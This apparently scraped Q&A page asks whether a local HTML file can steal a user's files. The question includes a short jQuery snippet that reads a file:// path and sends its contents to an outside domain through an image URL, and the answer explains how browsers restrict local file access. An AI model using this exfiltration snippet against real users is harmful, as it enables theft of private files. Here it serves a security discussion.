steal user's data by running html file

Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:

info.txt:

my info

index.html:

<!doctype html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $.get('file:///home/daz/desktop/info.txt', function (data) {
          $('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
        }, 'text');
      });
    </script>
  </head>    
  <body></body>
</html>

Some browers (firefox, for example) allow you to get files from file:// through XmlHttpRequest, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img tag with src leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain.com. And on the server side I can parse query string and get the data.

Am I right I can do this? Am I right I can get user's data from his computer if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).

UPDATED:

If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.

UPDATED 2:

It will be great if someone make a review about this issue. Thanks in advance!

Answers


It's less possible than you might think. Various browsers have implemented different restrictions on what local HTML files can do, as described in this post by the Chromium development team:

http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html

In particular:

  • Internet Explorer disables Javascript in local HTML files by default
  • Opera places some restrictions on cross-domain access from local files
  • Firefox applies subdirectory restrictions to local file access

(Note that this post is from 2008; browsers -- especially Chrome -- may have changed significantly since then.)


Need Your Help

Only make target if file exists

bash unix makefile make

In my makefile, I want to do something like this:

About UNIX Resources Network

Original, collect and organize Developers related documents, information and materials, contains jQuery, Html, CSS, MySQL, .NET, ASP.NET, SQL, objective-c, iPhone, Ruby on Rails, C, SQL Server, Ruby, Arrays, Regex, ASP.NET MVC, WPF, XML, Ajax, DataBase, and so on.